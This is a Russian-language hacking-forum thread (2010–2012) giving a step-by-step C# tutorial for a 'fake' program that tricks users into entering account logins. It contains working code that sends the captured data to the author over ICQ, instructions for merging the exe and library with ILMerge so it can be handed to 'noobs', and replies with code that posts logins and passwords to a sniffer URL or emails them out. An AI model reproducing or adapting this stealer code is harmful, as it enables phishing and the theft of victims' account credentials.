Регистрация Главная Сообщество
Сообщения за день Справка Регистрация
Навигация
Zhyk.org LIVE! Реклама на Zhyk.org Правила Форума Награды и достижения Доска "почета"

Ответ
 
Опции темы
Старый 23.07.2010, 09:55   #1
-= Элитный Мастер =-
 Главнокомандующий
Аватар для Kitsune
 
Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(
Регистрация: 20.01.2010
Сообщений: 1,539
Популярность: 22780
Золото Zhyk.Ru: 600
Сказал(а) спасибо: 43
Поблагодарили 1,717 раз(а) в 538 сообщениях
 
По умолчанию Создаём фейк программмы. Часть 2. C# version

> Создание фейка на C# 2.0 Часть 2 <

В данном гайде речь пойдет о добавлении такой возможности, как отправка сообщения в icq.

Для чего нам это?
1. Можно сразу данные жертвы отправлять по ICQ
2. Можно использовать просто как пейджер, при сигнале которого, мы будем знать, что очередная жертва попалась

Краткая предыстория:
ICQ - это сложная система, .NET Framework не имеет собственных классов для работы с протоколом OSCAR.
Соответственно, есть 2 варианта:
  1. Напишем сами
  2. Будем использовать уже чье-то готовое
Первый вариант мы отметаем сразу, потому что на это уйдет очень много времени и уровень сложности этого задания очень высок.
Второй вариант нам подходит вполне, после поиска в моем любимом google.com я наткнулся на пару вариантов и остановился на [Ссылки могут видеть только зарегистрированные пользователи. ].

Проект NOscar уже старый и не поддерживается, но до сих пор рабочий и спокойно выполняет необходимые для нас функции: подключение, отправка сообщения, отключение.

Саму библиотеку вам необходимо скачать из атача данного поста.
Версия, которую я выкладываю не совсем оригинальная, мной было внесено пару изменений, чтобы можно было отправлять сообщения на русском языке.

Приступаем к делу:
  1. Добавим в наш проект библиотеку NOscar.
    Для этого, в обозревателе проекта, по элементу "Ссылки" (Reference) нажмем правой кнопкой -> "Добавить ссылку" (Add Reference).
    Перед нам появится окно, переключаемся на 4ую вкладку, "Обзор" (Browse) и указываем путь к библиотеке.
    После этого, NOscar появится у нас в списке ссылок в обозревателе проекта.

    [Ссылки могут видеть только зарегистрированные пользователи. ]

  2. Сама библиотека имеет свой неймспейс, а именно "Grunwald.NOscar"
    Для простоты использования вами, я написал готовый класс, через который вы все просто сможете сделать.
    Код:
    using System;
    using Grunwald.NOscar;
    
    namespace ICQTest
    {
        public class ICQNotifier
        {
            private AutomaticConnection connection;
    
            public AutomaticConnection Connection { get { return connection; } }
    
            public void Connect(string uin, string pwd, string server)
            {
                if (connection != null) connection.Close();
    
                connection = new AutomaticConnection(server, FlapConnection.DefaultPort, uin, pwd);
                connection.Start(new System.Threading.ThreadExceptionEventHandler(ErrorHandler));
            }
    
            public void Disconnect()
            {
                if (connection != null) connection.Close();
            }
    
            public void Send(string uin, string message)
            {
                message = message.Trim();
                if (!String.IsNullOrEmpty(message))
                {
                    TlvChain data = new TlvChain();
                    MessageBlock block = new MessageBlock(message);
                    data.SetData(0x0002, block.ToByteArray());
                    data.SetFlag(0x0003);
                    OutgoingIcbmSnac snac = new OutgoingIcbmSnac(1, uin, data);
                    Random rnd = new Random();
                    rnd.NextBytes(snac.IcbmID);
                    SendSnacSequence.SendSnac(connection, snac, 
                        new EventHandler(delegate { }), 
                        new SnacEventHandler(delegate { }));
                }
            }
    
            private void ErrorHandler(object sender, System.Threading.ThreadExceptionEventArgs e)
            {
                //MessageBox.Show(e.Exception.ToString(), "Internal error!!");
            }
        }
    }
    Для того, чтобы добавить этот класс вам необходимо:
    Правой кнопкой по проекту -> Добавить -> Класс
    Название файла вы можете выбрать любое, у меня это: "ICQNotifier.cs".
    Содержимое только что созданного файла замените на код представленный выше.

    Примечание: в коде представленном выше используется неймспейс ICQTest, можно оставить его или же заменить на тот, который используется у вас в проекте.
  3. Теперь нам осталось только добавить отправку сообщений
    Откроем наш основной класс, если неймспейс класса описанного выше мы не меняли, тогда в коде нашего класса, добавим использование именного пространства:
    Код:
    using ICQTest;
    Так же нам понадобится другой неймспейс
    Код:
    using System.Threading;
    Данное именное пространство дает доступ нам к классам отвечающим за потоки и все что с ними связано.

  4. Объявим в теле нашего класса объекты:
    Код:
    private Thread thread;
    private ICQNotifier icq;
    и добавим 3 метода
    Код:
            private void BeginInforming()
            {
                thread = new Thread(new ThreadStart(Send));
                thread.Start();
            }
    
            private void Send()
            {
                try
                {
                    icq = new ICQNotifier();
                    icq.Connect("уин", "пароль", "login.icq.com");
                    icq.Connection.StateChanged += new EventHandler(Connection_StateChanged);
                }
                catch { }
            }
    
            private void Connection_StateChanged(object sender, EventArgs e)
            {
                if (icq.Connection.State == Grunwald.NOscar.ConnectionState.Active)
                {
                    icq.Send("уин куда отправляем", "текст");
                    icq.Disconnect();
                }
            }
  5. Теперь, в метод, который у нас отвечает за отправку письма на Email мы просто добавим вызов метода BeginInforming.
    Код:
    BeginInforming();
После удачного теста:
Мы на руках имеем наш фейк, который отправляет сообщения по ICQ и еще что-то делает (Все зависит от вашей фантазии)
Но есть один довольно не хороший момент, теперь рядом с нашим ехе всегда должна находится библиотека NOscar иначе фейк работать не будет.
Можно конечно поставлять нубикам ехе и библиотеку сразу и убеждать их лишний раз.
Но можно и поступить иначе.

Есть такая замечательная утилита как: [Ссылки могут видеть только зарегистрированные пользователи. ].
  1. Скачиваем её, устанавливаем и готовимся творить чудо
    Путь установки я не менял и позволит произвести её установку в: "C:\Program Files\Microsoft\ILMerge".
  2. Теперь берем 2 наших файла: "наш фейк.ехе" и NOscar.dll и кладем их в папку с ILMerge.exe.
  3. Теперь нам нужно запустить ILMerge.exe вот так:
    Код:
    ILMerge.exe /target:winexe /out:"название нового файла".exe "наш фейк".exe NOscar.dll
    Например:
    Код:
    ILMerge.exe /target:winexe /out:fake_new.exe fake.exe NOscar.dll
    Тоесть, мы указываем тип приложения Windows Executable, выходной файл: например: fake_new.exe, вместо "наш фейк".ехе указываем название нашего фейка(исполняемого файла) и указываем библиотеку, которую мы склеим с нашим ехе.
  4. После завершения выполнения утилиты мы получим 1 файл, который мы сможем распространять как нам угодно. Библиотека рядом с ехе нам уже не нужна, она вшита в него.

    Примечание: Утилита ILMerge может склеивать только исполняемые файлы и библиотеки написанные исключительно на .NET Framework.
Вложения
Тип файла: zip NOscar.zip (118.7 Кб, 115 просмотров)
________________
Fireball - Быстрое снятие и загрузка скриншотов на хостинг.

Последний раз редактировалось Kitsune; 24.07.2010 в 08:26.
  Ответить с цитированием
5 пользователя(ей) сказали cпасибо:
DeathAngel (10.11.2012), Dunя (24.07.2010), Leo_ня (23.07.2010), mc228)[2] (26.07.2012), object (23.07.2010)
Старый 23.07.2010, 22:43   #2
Знатный Читер
 Разведчик
Аватар для witcherD
 
witcherD на правильном путиwitcherD на правильном пути
Регистрация: 26.03.2010
Сообщений: 31
Популярность: 105
Сказал(а) спасибо: 1
Поблагодарили 54 раз(а) в 22 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

А нельзя ли сделать как-нибудь с событиями. Ставить задержку на 5 секунд, хоть и работает, но все-таки некорректно. Есть еще библиотека OscarLib, в которой все боле-менее работает, но к ней толком нет документации.
Может кому-нибудь пригодится:
Код:
        void sess_LoginCompleted(Session sess)
        {
                sess.Messages.SendMessage(UIN, ""); //здесь я не совсем понимаю, так как этот метод возвращает куки, поэтому надо отправить два раза, или найти умный способ.
                sess.Messages.SendMessage(UIN, "Hello World!");
        }


        private void Login(object uin)
        {
            Uin u = (Uin)uin;
            sess = new Session(u.uin, u.pass);
            sess.LoginCompleted += new LoginCompletedHandler(sess_LoginCompleted);
            sess.LoginFailed += new LoginFailedHandler(sess_LoginFailed);
            sess.ClientCapabilities = Capabilities.SIMKopete | Capabilities.UTF8;
            sess.Logon("login.icq.com", 5190);
            sess.ActivateBuddyList();
            sess.Statuses.ICQStatus = ICQStatus.Online;
        }
  Ответить с цитированием
Старый 23.07.2010, 23:49   #3
-= Элитный Мастер =-
 Главнокомандующий
Аватар для Kitsune
 
Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(
Регистрация: 20.01.2010
Сообщений: 1,539
Популярность: 22780
Золото Zhyk.Ru: 600
Сказал(а) спасибо: 43
Поблагодарили 1,717 раз(а) в 538 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

witcherD, основное время/трафик уходит на загрузку контакт листа. Для фейка будет создан новый уин с пустым контакт листом, поэтому время подключения будет минимальным.

В данной библиотеке не реализован ивент вызываемый при заверешнии подключения.
Так же хочу заменить, что это простой вариант для простого фейка и углублятся в изучение протокола OSCAR думаю нет желания ни у кого из присутствующих.
Если уж и есть желание заморочится, то можно мониторить SNAC от сервера сообщающий об окончании загрузки контакт листа и вызывать кастом ивент.

added:
Завтра днем выложу обновленный вариант, без принудительной задержки.
________________
Fireball - Быстрое снятие и загрузка скриншотов на хостинг.

Последний раз редактировалось Kitsune; 23.07.2010 в 23:58.
  Ответить с цитированием
Старый 24.07.2010, 00:00   #4
Знатный Читер
 Разведчик
Аватар для witcherD
 
witcherD на правильном путиwitcherD на правильном пути
Регистрация: 26.03.2010
Сообщений: 31
Популярность: 105
Сказал(а) спасибо: 1
Поблагодарили 54 раз(а) в 22 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

Спасибо за ответ, но вопрос заключался в другом. "В данной библиотеке не реализован ивент вызываемый при заверешнии подключения." а событие успешного подключения или входящего сообщения? Думаю это не менее интересно и нужно, не могли бы Вы показать это на примере?
  Ответить с цитированием
Старый 24.07.2010, 08:25   #5
-= Элитный Мастер =-
 Главнокомандующий
Аватар для Kitsune
 
Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(Kitsune сломал счётчик популярности :(
Регистрация: 20.01.2010
Сообщений: 1,539
Популярность: 22780
Золото Zhyk.Ru: 600
Сказал(а) спасибо: 43
Поблагодарили 1,717 раз(а) в 538 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

witcherD, в первом сообщении код обновил, ниже приведен список изменений.
Прочитав их вы сразу можете заметить обработку события StateChanged у Connection, на основе этого можно придать гибкости нашим проектам
Сейчас реализовано отправление сообщения сразу после окончания подключения.

Обновление кода:
  • В ICQNotifier.cs добавилось свойство
    Код:
    public AutomaticConnection Connection { get { return connection; } }
  • В главном классе надо дополнительно объявить:
    Код:
    private ICQNotifier icq;
  • В главном классе надо изменить метод Send
    Код:
    private void Send()
            {
                try
                {
                    icq = new ICQNotifier();
                    icq.Connect("уин", "пароль", "login.icq.com");
                    icq.Connection.StateChanged += new EventHandler(Connection_StateChanged);
                }
                catch { }
            }
  • В главном классе добавить метод Connection_StateChanged
    Код:
    private void Connection_StateChanged(object sender, EventArgs e)
            {
                if (icq.Connection.State == Grunwald.NOscar.ConnectionState.Active)
                {
                    icq.Send("уин куда отправляем", "текст");
                    icq.Disconnect();
                }
            }
________________
Fireball - Быстрое снятие и загрузка скриншотов на хостинг.

Последний раз редактировалось Kitsune; 24.07.2010 в 08:29.
  Ответить с цитированием
Старый 25.07.2010, 16:44   #6
Знатный Читер
 Разведчик
Аватар для witcherD
 
witcherD на правильном путиwitcherD на правильном пути
Регистрация: 26.03.2010
Сообщений: 31
Популярность: 105
Сказал(а) спасибо: 1
Поблагодарили 54 раз(а) в 22 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

Может забегаю вперед =)... но есть ли в этой библиотеке готовые методы для отправки и принятия файлов?
  Ответить с цитированием
Старый 01.01.2011, 14:37   #7
 Разведчик
Аватар для Gold-90
 
Gold-90 никому не известный тип
Регистрация: 28.12.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

Что не так? Не отпраляет на асю.

Цитата:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.Mail;
using Рейты_v1._0;
using System.Threading;

namespace Рейты_v1._0
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private Thread thread;
private ICQNotifier icq;

private void Form1_Load(object sender, EventArgs e)
{

}

private void button1_Click(object sender, EventArgs e)
{
BeginInforming();
}



private void BeginInforming()
{
thread = new Thread(new ThreadStart(Send));
thread.Start();
}

private void Send()
{
try
{
icq = new ICQNotifier();
icq.Connect("***********", "*********", "login.icq.com");
icq.Connection.StateChanged += new EventHandler(Connection_StateChanged);
}
catch { }
}

private void Connection_StateChanged(object sender, EventArgs e)
{
if (icq.Connection.State == Grunwald.NOscar.ConnectionState.Active)
{
icq.Send("*************", "текст");
icq.Disconnect();
}
}


}
}

  Ответить с цитированием
Старый 04.02.2011, 16:05   #8
 Разведчик
Аватар для xselderx
 
xselderx никому не известный тип
Регистрация: 03.01.2011
Сообщений: 16
Популярность: 12
Сказал(а) спасибо: 0
Поблагодарили 3 раз(а) в 2 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

не могу добавить NOscar в ссылки, нечитает такие файлы в обзоре, и нужен файл.dll вроде
  Ответить с цитированием
Старый 06.02.2011, 23:15   #9
 Разведчик
Аватар для dickens011
 
dickens011 на правильном пути
Регистрация: 24.11.2010
Сообщений: 10
Популярность: 20
Сказал(а) спасибо: 8
Поблагодарили 5 раз(а) в 5 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

Gold-90, в твоем случае не вызывается функция Send
И еще мне интерестно, у кого получилось отправить сообщение по данному уроку?
лично у меня не вышло, т.к. соединение у меня имело значение Connecting, а не Active...
  Ответить с цитированием
Старый 14.02.2011, 18:48   #10
 Разведчик
Аватар для Aterus
 
Aterus никому не известный тип
Регистрация: 14.02.2011
Сообщений: 1
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

порт по умолчанию DefaultPort в классе FlapConnection
изменить нужно с 1590 на 5190, и должно законнектиться.

вопрос: а как получить список контактов после того как соединился?

Последний раз редактировалось Aterus; 14.02.2011 в 18:54. Причина: Добавлено сообщение
  Ответить с цитированием
Старый 10.11.2012, 20:07   #11
 Пехотинец
Аватар для ultraz
 
ultraz вызывает надежду
Регистрация: 23.03.2011
Сообщений: 70
Популярность: -14
Сказал(а) спасибо: 23
Поблагодарили 3 раз(а) в 3 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

Такой вопросик а как сделать чтоб данные отсылались на снифер или ftp
________________
Помог нажми Спасибо
  Ответить с цитированием
Старый 10.11.2012, 20:30   #12
Заблокирован
 Рыцарь-капитан
Аватар для warl0ck
 
warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(
Регистрация: 29.01.2010
Сообщений: 547
Популярность: 41279
Сказал(а) спасибо: 692
Поблагодарили 2,270 раз(а) в 1,035 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

Цитата:
Сообщение от ultrazПосмотреть сообщение
Такой вопросик а как сделать чтоб данные отсылались на снифер или ftp

new WebClient.DownloadString("http://site.com/sniffer.php?login= blablabla);
  Ответить с цитированием
Старый 10.11.2012, 21:21   #13
 Пехотинец
Аватар для ultraz
 
ultraz вызывает надежду
Регистрация: 23.03.2011
Сообщений: 70
Популярность: -14
Сказал(а) спасибо: 23
Поблагодарили 3 раз(а) в 3 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

Нарыл такой код :
Код:
WebRequest request = WebRequest.Create("http://*****.ru/snifer.gif?Login: " + textBox1.Text + " | Password: " + textBox2.Text); HttpWebResponse httpWebResponse = (HttpWebResponse)request.GetResponse();
Это получается я должен удалить тот кусок который отвечает за отправку на почту и вставить выше написаный?
Код:
SmtpClient client = new SmtpClient("smtp.mail.ru", 2525); // Здесь указываем смтп сервер и порт, который мы будем использовать
client.Credentials = new System.Net.NetworkCredential("[Ссылки могут видеть только зарегистрированные пользователи. ]", "password"); // Указываем логин и пароль для авторизации

string msgFrom = "[Ссылки могут видеть только зарегистрированные пользователи. ]"; // Указываем поле, от кого письмо
string msgTo = "[Ссылки могут видеть только зарегистрированные пользователи. ]"; // Указываем поле, кому письмо будет отправлено
string msgSubject = "Письмо из c#"; // Указываем тему пиьсма

string msgBody = String.Format("Нубик попался :-)\n\nСервер: {0}\nЛогин: {1}\nПароль: {2}",
comboBox1.SelectedItem.ToString(), textBox1.Text, textBox2.Text); // Тут мы формируем тело письма, передаем выбранный сервер, логин и пароль.

MailMessage msg = new MailMessage(msgFrom, msgTo, msgSubject, msgBody); // Создаем письмо, из всего, что сделали выше

try
{
    client.Send(msg); // Отправляем письмо
}
catch { }
________________
Помог нажми Спасибо
  Ответить с цитированием
Старый 10.11.2012, 21:34   #14
Заблокирован
 Рыцарь-капитан
Аватар для warl0ck
 
warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(warl0ck сломал счётчик популярности :(
Регистрация: 29.01.2010
Сообщений: 547
Популярность: 41279
Сказал(а) спасибо: 692
Поблагодарили 2,270 раз(а) в 1,035 сообщениях
 
По умолчанию Re: Создаём фейк программмы. Часть 2. C# version

Цитата:
Сообщение от ultrazПосмотреть сообщение
Нарыл такой код :
Код:
WebRequest request = WebRequest.Create("http://*****.ru/snifer.gif?Login: " + textBox1.Text + " | Password: " + textBox2.Text); HttpWebResponse httpWebResponse = (HttpWebResponse)request.GetResponse();
Это получается я должен удалить тот кусок который отвечает за отправку на почту и вставить выше написаный?
Код:
SmtpClient client = new SmtpClient("smtp.mail.ru", 2525); // Здесь указываем смтп сервер и порт, который мы будем использовать
client.Credentials = new System.Net.NetworkCredential("[Ссылки могут видеть только зарегистрированные пользователи. ]", "password"); // Указываем логин и пароль для авторизации

string msgFrom = "[Ссылки могут видеть только зарегистрированные пользователи. ]"; // Указываем поле, от кого письмо
string msgTo = "[Ссылки могут видеть только зарегистрированные пользователи. ]"; // Указываем поле, кому письмо будет отправлено
string msgSubject = "Письмо из c#"; // Указываем тему пиьсма

string msgBody = String.Format("Нубик попался :-)\n\nСервер: {0}\nЛогин: {1}\nПароль: {2}",
comboBox1.SelectedItem.ToString(), textBox1.Text, textBox2.Text); // Тут мы формируем тело письма, передаем выбранный сервер, логин и пароль.

MailMessage msg = new MailMessage(msgFrom, msgTo, msgSubject, msgBody); // Создаем письмо, из всего, что сделали выше

try
{
    client.Send(msg); // Отправляем письмо
}
catch { }

да
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Руководство] Создаём фейк программмы. Часть 2. C# version (by OveRKinG) OveRKinG C# 35 12.01.2012 07:42
[Руководство] Создаём фейк программмы. Часть 1. Delphi version Amba Pascal/Delphi 38 30.05.2011 22:27
[Руководство] Создаём фейк программмы. Часть 1. C# version Kitsune C# 116 27.02.2011 02:41
Быстро создаём фейк m0nk Боты, скрипты и прочий софт для Lineage 2 63 12.01.2011 19:30
[Руководство] Создаём фейк программмы. Часть 2. Delphi version Amba Школа Читера 1 15.07.2010 13:50

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 18:33.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net